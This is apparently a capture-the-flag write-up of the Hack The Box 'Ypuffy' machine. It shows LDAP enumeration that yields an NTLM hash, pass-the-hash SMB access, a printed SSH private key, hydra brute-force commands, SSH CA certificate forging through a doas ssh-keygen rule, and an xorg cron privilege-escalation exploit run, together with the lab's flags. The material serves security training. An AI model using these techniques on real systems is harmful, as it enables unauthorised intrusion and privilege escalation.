Ypuffy

# Getting started

Normally I start off with a nmap portscan and from there enumerate my way up.
But because I’m doing OSCP, I have written a program that does the enumeration for me and gives me recommendation according to its findings.
Not because I’m lazy, but normally this will save me time.

██████╗ ███████╗██████╗     ████████╗███████╗ █████╗ ███╗   ███╗    ██╗  ██╗██╗████████╗
██╔══██╗██╔════╝██╔══██╗    ╚══██╔══╝██╔════╝██╔══██╗████╗ ████║    ██║ ██╔╝██║╚══██╔══╝
██████╔╝█████╗  ██║  ██║       ██║   █████╗  ███████║██╔████╔██║    █████╔╝ ██║   ██║
██╔══██╗██╔══╝  ██║  ██║       ██║   ██╔══╝  ██╔══██║██║╚██╔╝██║    ██╔═██╗ ██║   ██║
██║  ██║███████╗██████╔╝       ██║   ███████╗██║  ██║██║ ╚═╝ ██║    ██║  ██╗██║   ██║
╚═╝  ╚═╝╚══════╝╚═════╝        ╚═╝   ╚══════╝╚═╝  ╚═╝╚═╝     ╚═╝    ╚═╝  ╚═╝╚═╝   ╚═╝
Created by n0w4n
[-] Do you want to save the reports? (y/n) y
[-] Give path for saving the reports (example: /root/rtk/reports/): /root/htb/ypuffy
[-] What is the IP address of the target? 10.10.10.107
[*] Starting a fast TCP portscan on target
[*] Parsing output into a tmp file for further analysis
[*] Starting a TCP full scan on the target with acquired ports
[*] This can take some time
[*] Starting a fast UDP portscan on target
[*] Parsing output into a tmp file for further analysis
[*] There are no open UDP ports......skipping
[*] Creating report
#############################################################################################
[*] Found the following open ports and services on the target:
22	tcp	   OpenSSH 7.7 (protocol 2.0)
80	tcp	   OpenBSD httpd
139	tcp	   Samba smbd 3.X - 4.X (workgroup: YPUFFY)
389	tcp	   (Anonymous bind OK)
445	tcp	   Samba smbd 4.7.6 (workgroup: YPUFFY)
#############################################################################################
[*] The following recommendations can be made:
[*] DOMAIN
Found domain = hackthebox.htb
Found fqdn   = ypuffy.hackthebox.htb
Use command to add to hosts:
  1.) echo 10.10.10.107 hackthebox.htb >> /etc/hosts
[*] SMB
No open shares found!
[*] SSH
Try bruteforcing with the commands:
  1.) hydra -l root -P /usr/share/wordlists/rockyou.txt 10.10.10.107 -t 4 ssh
  2.) hydra -L /usr/share/wordlists/seclists/Usernames/Names/names.txt -P /usr/share/wordlists/rockyou.txt 10.10.10.107 -t 4 ssh
  (If nothing else works - try this as a last resort)
[*] WEB
To enumerate the directories run the command:
1.) python3 <path to dirsearch>/dirsearch.py -u 10.10.10.107 -e php,html,htm,cgi,asp,aspx,pdf,txt -x 400,403,404 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
back to (m)ain menu or (e)xit this program?

This small bash script contains a framework that uses a lot of pentesting tools in an semi-automated way.
If you really want to learn what you’re doing, you maybe wanna do all of this stuff manually. But if you know your way around Kali, this tool can save up some time.
After I’m done with OSCP this tool will be posted on GitHub for anyone interested.
Some useful information about OpenBSD LDAP security: http://puffysecurity.com/wiki/ypldap.html
When I try to connect with the webserver I get an error 400 <bad request> and my browser is reset.
But with nc I get another view:

root@kali:~/htb/ypuffy# nc -nv 10.10.10.107 80
(UNKNOWN) [10.10.10.107] 80 (http) open
HTTP/1.0 400 Bad Request
Date: Thu, 03 Jan 2019 11:26:59 GMT
Server: OpenBSD httpd
Connection: close
Content-Type: text/html
Content-Length: 431
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>400 Bad Request</title>
<style type="text/css"><!--
body { background-color: white; color: black; font-family: 'Comic Sans MS', 'Chalkboard SE', 'Comic Neue', sans-serif; }
hr { border: 0; border-bottom: 1px dashed; }
--></style>
</head>
<body>
<h1>400 Bad Request</h1>
<hr>
<address>OpenBSD httpd</address>
</body>
</html>

The use of the HTML address tag is a bit odd. Because there is a public facing LDAP service I try to connect to it with JXplorer.

cn Alice
displayName Alice
gecos Alice
gidNumber 5000
homeDirectory /home/alice1978
loginShell /bin/ksh
sambaNTPassword 0B186E661BBDBDCF6047784DE8B9FD8B
sambaSID S-1-5-21-3933741069-3307154301-3557023464-1001
uid alice1978
uidNumber 5000
userPassword {BSDAUTH}alice1978

We got some info about user Alice.

cn Bob
gecos Bob
gidNumber 5001
homeDirectory /home/bob8791
loginShell /bin/ksh
uid bob8791
uidNumber 5001
userPassword {BSDAUTH}bob8791

And there is some info about user Bob.
The most useful piece of information here is the hash from Alice.
This will grant anyone access to the samba server.
To test this there is a nice tool called crackmapexec. This tool can be used to scan a network and check if the creds can be applied on several machines.
In this case it is just one machine.

root@kali:~# crackmapexec 10.10.10.107 -u alice1978 -H 0B186E661BBDBDCF6047784DE8B9FD8B
CME          10.10.10.107:445 YPUFFY          [*] Windows 6.1 Build 0 (name:YPUFFY) (domain:YPUFFY)
CME          10.10.10.107:445 YPUFFY          [+] YPUFFY\alice1978 0B186E661BBDBDCF6047784DE8B9FD8B
[*] KTHXBYE!

It looks like it works. To connect I can use smbclient.py, found in the impacket collection.

root@kali:~/opt/tools/impacket/build/scripts-2.7# ./smbclient.py -hashes :0B186E661BBDBDCF6047784DE8B9FD8B YPUFFY/alice1978@10.10.10.107
Impacket v0.9.19-dev - Copyright 2018 SecureAuth Corporation
Type help for list of commands
# shares
alice
IPC$
# use alice
# ls
drw-rw-rw-          0  Tue Jul 31 04:54:20 2018 .
drw-rw-rw-          0  Wed Aug  1 05:16:50 2018 ..
-rw-rw-rw-       1460  Tue Jul 17 03:38:51 2018 my_private_key.ppk
# get my_private_key.ppk

root@kali:~/htb/ypuffy# cat my_private_key.ppk
PuTTY-User-Key-File-2: ssh-rsa
Encryption: none
Comment: rsa-key-20180716
Public-Lines: 6
AAAAB3NzaC1yc2EAAAABJQAAAQEApV4X7z0KBv3TwDxpvcNsdQn4qmbXYPDtxcGz
1am2V3wNRkKR+gRb3FIPp+J4rCOS/S5skFPrGJLLFLeExz7Afvg6m2dOrSn02qux
BoLMq0VSFK5A0Ep5Hm8WZxy5wteK3RDx0HKO/aCvsaYPJa2zvxdtp1JGPbN5zBAj
h7U8op4/lIskHqr7DHtYeFpjZOM9duqlVxV7XchzW9XZe/7xTRrbthCvNcSC/Sxa
iA2jBW6n3dMsqpB8kq+b7RVnVXGbBK5p4n44JD2yJZgeDk+1JClS7ZUlbI5+6KWx
ivAMf2AqY5e1adjpOfo6TwmB0Cyx0rIYMvsog3HnqyHcVR/Ufw==
Private-Lines: 14
AAABAH0knH2xprkuycHoh18sGrlvVGVG6C2vZ9PsiBdP/5wmhpYI3Svnn3ZL8CwF
VGaXdidhZunC9xmD1/QAgCgTz/Fh5yl+nGdeBWc10hLD2SeqFJoHU6SLYpOSViSE
cOZ5mYSy4IIRgPdJKwL6NPnrO+qORSSs9uKVqEdmKLm5lat9dRJVtFlG2tZ7tsma
hRM//9du5MKWWemJlW9PmRGY6shATM3Ow8LojNgnpoHNigB6b/kdDozx6RIf8b1q
Gs+gaU1W5FVehiV6dO2OjHUoUtBME01owBLvwjdV/1Sea/kcZa72TYIMoN1MUEFC
3hlBVcWbiy+O27JzmDzhYen0Jq0AAACBANTBwU1DttMKKphHAN23+tvIAh3rlNG6
m+xeStOxEusrbNL89aEU03FWXIocoQlPiQBr3s8OkgMk1QVYABlH30Y2ZsPL/hp6
l4UVEuHUqnTfEOowVTcVNlwpNM8YLhgn+JIeGpJZqus5JK/pBhK0JclenIpH5M2v
4L9aKFwiMZxfAAAAgQDG+o9xrh+rZuQg8BZ6ZcGGdszZITn797a4YU+NzxjP4jR+
qSVCTRky9uSP0i9H7B9KVnuu9AfzKDBgSH/zxFnJqBTTykM1imjt+y1wVa/3aLPh
hKxePlIrP3YaMKd38ss2ebeqWy+XJYwgWOsSw8wAQT7fIxmT8OYfJRjRGTS74QAA
AIEAiOHSABguzA8sMxaHMvWu16F0RKXLOy+S3ZbMrQZr+nDyzHYPaLDRtNE2iI5c
QLr38t6CRO6zEZ+08Zh5rbqLJ1n8i/q0Pv+nYoYlocxw3qodwUlUYcr1/sE+Wuvl
xTwgKNIb9U6L6OdSr5FGkFBCFldtZ/WSHtbHxBabb0zpdts=
Private-MAC: 208b4e256cd56d59f70e3594f4e2c3ca91a757c9

# Remote access

This is a ppk file which is a file format used by Windows program PuTTY. To convert this key I use a tool called puttygen.

root@kali:~/htb/ypuffy# puttygen my_private_key.ppk -O private-openssh -o private.key
root@kali:~/htb/ypuffy# chmod 600 private.key
root@kali:~/htb/ypuffy# ssh -i private.key alice1978@10.10.10.107
OpenBSD 6.3 (GENERIC) #100: Sat Mar 24 14:17:45 MDT 2018
Welcome to OpenBSD: The proactively secure Unix-like operating system.
Please use the sendbug(1) utility to report bugs in the system.
Before reporting a bug, please try to reproduce it with the latest
version of the code.  With bug reports, please try to ensure that
enough information to reproduce the problem is enclosed, and if a
known fix for it exists, include that as well.
ypuffy$ id
uid=5000(alice1978) gid=5000(alice1978) groups=5000(alice1978)

ypuffy$ ls
user.txt windir
ypuffy$ cat user.txt
acbc06eb2982b14c2756b6c6e3767aab

First flag. On to root.

ypuffy$ awk -F : '$3 >= 1000 {print $0}' /etc/passwd
nobody:*:32767:32767:Unprivileged user:/nonexistent:/sbin/nologin
appsrv:*:1000:1000:Application Server:/var/appsrv:/sbin/nologin
userca:*:1001:1001:User CA:/home/userca:/bin/ksh

It looks like my current user is a non-user and the only user on this system is userca.

ypuffy$ cat /etc/doas.conf
permit keepenv :wheel
permit nopass alice1978 as userca cmd /usr/bin/ssh-keygen

On OpenBSD there is a command that is similar like the sudo command and that is doas. This command let you run commands as someone else.
In this case alice can run the command ssh-keygen as userca. Maybe this will give the opportunity to generate new ssh-keys and get them signed.
Because ssh seems to be playing an important role in this scenario I took a look at the SSH server config file: /etc/ssh/sshd_config

...SNIP...
# The default is to check both .ssh/authorized_keys and .ssh/authorized_keys2
# but this is overridden so installations will only check .ssh/authorized_keys
AuthorizedKeysFile      .ssh/authorized_keys
#AuthorizedPrincipalsFile none
AuthorizedKeysCommand /usr/local/bin/curl http://127.0.0.1/sshauth?type=keys&username=%u
AuthorizedKeysCommandUser nobody
TrustedUserCAKeys /home/userca/ca.pub
AuthorizedPrincipalsCommand /usr/local/bin/curl http://127.0.0.1/sshauth?type=principals&username=%u
AuthorizedPrincipalsCommandUser nobody
...SNIP...

For the AuthorizedKeysCommand and AuthorizedPrincipalsCommand there is a curl command that tries to retrieve keys from an user (placeholder %u).
There is a webserver running, but it was not accessible from the outside. What is in the config file?

ypuffy$ cat /etc/httpd.conf
server "ypuffy.hackthebox.htb" {
        listen on * port 80
        location "/userca*" {
                root "/userca"
                root strip 1
                directory auto index
        }
        location "/sshauth*" {
                fastcgi socket "/run/wsgi/sshauthd.socket"
        }
        location * {
                block drop
        }
}

Let’s see what running the curl command retrieves.

ypuffy$ curl http://127.0.0.1/sshauth?type=principals&username=root
[1] 40045
ypuffy$ <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<title>400 Bad Request</title>
<h1>Bad Request</h1>
<p>The browser (or proxy) sent a request that this server could not understand.</p>
[1] + Done                 curl http://127.0.0.1/sshauth?type=principals

Hmmmm…..that doesn’t look right.

ypuffy$ curl "http://127.0.0.1/sshauth?type=principals&username=root"
3m3rgencyB4ckd00r

Much better. When using curl you need to encase the entire string in quotes for it to accept parameters.
Normally I would think this is a password for root or something similar.
But after a login try as root that didn’t work. Therefor I gues (after reading the ssh document) it’s a principal name.
I have used SSH a lot, but mostly as user when it was fully configured.
https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/deployment_guide/sec-creating_ssh_ca_certificate_signing-keys has some interesting information about the use of creating ssh keys and certificates.
So this link is a good read about creating a chain-of-trust and how to set up a SSH CA structure.
According to the sshd config file it looks like the TrustedUserCAKeys are in /home/userca/ca.pub.
I’m going to create a public key on my kali host, transport it to the remote host and sign it there with the private key from userca.
Hopefully this will grant me access as root.

root@kali:~/htb/ypuffy/ssh# ssh-keygen -t rsa -f ./id_rsa
Generating public/private rsa key pair.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in ./id_rsa.
Your public key has been saved in ./id_rsa.pub.
The key fingerprint is:
SHA256:DB3UuFQzQf8z67vOXGwnkRPgZ8jf2JmSul3Ho7gKYQk root@kali
The key's randomart image is:
+---[RSA 2048]----+
|       .o=*..    |
|       .o..* o   |
|     E....  = +  |
|      .oo    =.*o|
|       +S    oXoo|
|      . .   . .O |
|       .   .  ooB|
|        .   ++o++|
|         ..+.+Bo |
+----[SHA256]-----+

Now to copy the files to the remote host.

root@kali:~/htb/ypuffy/ssh# scp -i ../private.key id* alice1978@10.10.10.107:/tmp/n0w4n/
id_rsa                                                                                                                                                                          100% 1811    70.3KB/s   00:00
id_rsa.pub

And finally signing my public key with the private key found in /home/userca/ca.
It’s important here to use the found principal name in the signing command.

ypuffy$ doas -u userca /usr/bin/ssh-keygen -s /home/userca/ca -I n0w4n -n 3m3rgencyB4ckd00r /tmp/id_rs>
Signed user key /tmp/id_rsa-cert.pub: id "n0w4n" serial 0 for 3m3rgencyB4ckd00r valid forever

It looks like the signing is successful.
Lets see if it worked.

ypuffy$ ssh -i id_rsa -l root 127.0.0.1
The authenticity of host '127.0.0.1 (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:oYYpshmLOvkyebJUObgH6bxJkOGRu7xsw3r7ta0LCzE.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '127.0.0.1' (ECDSA) to the list of known hosts.
OpenBSD 6.3 (GENERIC) #100: Sat Mar 24 14:17:45 MDT 2018
Welcome to OpenBSD: The proactively secure Unix-like operating system.
Please use the sendbug(1) utility to report bugs in the system.
Before reporting a bug, please try to reproduce it with the latest
version of the code.  With bug reports, please try to ensure that
enough information to reproduce the problem is enclosed, and if a
known fix for it exists, include that as well.
ypuffy# id
uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)

And finally for the flag.

ypuffy# cat /root/root.txt
1265f8e0a1984edd9dc1b6c3fcd1757f

# Alternate exploit

If you don’t want to do all the hassle with SSH, keys and signing there is an alternate way of rooting this box.
There is a fairly new xorg-x11-server vulnerability which can be exploited using OpenBSD’s cron.
The exploit can be found here: https://github.com/0xdea/exploits/blob/master/openbsd/raptor_xorgasm

ypuffy$ vi exploit.sh
...[PASTING THE SCRIPT]...
ypuffy$ chmod +x exploit.sh
ypuffy$ ./exploit.sh
./opt.sh[10]: ptor_xorgasm: not found
raptor_xorgasm - xorg-x11-server LPE via OpenBSD's cron
Copyright (c) 2018 Marco Ivaldi <raptor@0xdeadbeef.info>
X.Org X Server 1.19.6
Release Date: 2017-12-20
X Protocol Version 11, Revision 0
Build Operating System: OpenBSD 6.3 amd64
Current Operating System: OpenBSD ypuffy.hackthebox.htb 6.3 GENERIC#100 amd64
Build Date: 24 March 2018  02:38:24PM
Current version of pixman: 0.34.0
        Before reporting problems, check http://wiki.x.org
        to make sure that you have the latest version.
Markers: (--) probed, (**) from config file, (==) default setting,
        (++) from command line, (!!) notice, (II) informational,
        (WW) warning, (EE) error, (NI) not implemented, (??) unknown.
(++) Log file: "crontab", Time: Thu Jan  3 16:21:01 2019
(==) Using system config directory "/usr/X11R6/share/X11/xorg.conf.d"
(EE) Segmentation fault at address 0x8
(EE)
Fatal server error:
(EE) Caught signal 11 (Segmentation fault). Server aborting
(EE)
(EE)
Please consult the The X.Org Foundation support
         at http://wiki.x.org
 for help.
(EE) Please also check the log file at "crontab" for additional information.
(EE)
(EE) Server terminated with error (1). Closing log file.
Be patient for a couple of minutes...
Don't forget to cleanup and run crontab -e to reload the crontab.
-rw-r--r--  1 root  wheel  4814 Jan  3 16:21 /etc/crontab
-rwsrwxrwx  1 root  wheel  7257 Jan  3 16:23 /usr/local/bin/pwned
ypuffy# id
uid=0(root) gid=0(wheel) groups=5000(alice1978)

And the final step….

ypuffy# cat root.txt
1265f8e0a1984edd9dc1b6c3fcd1757f

Not really the way you wanna do this box as it is more a script kiddie way which doesn’t teach you a thing.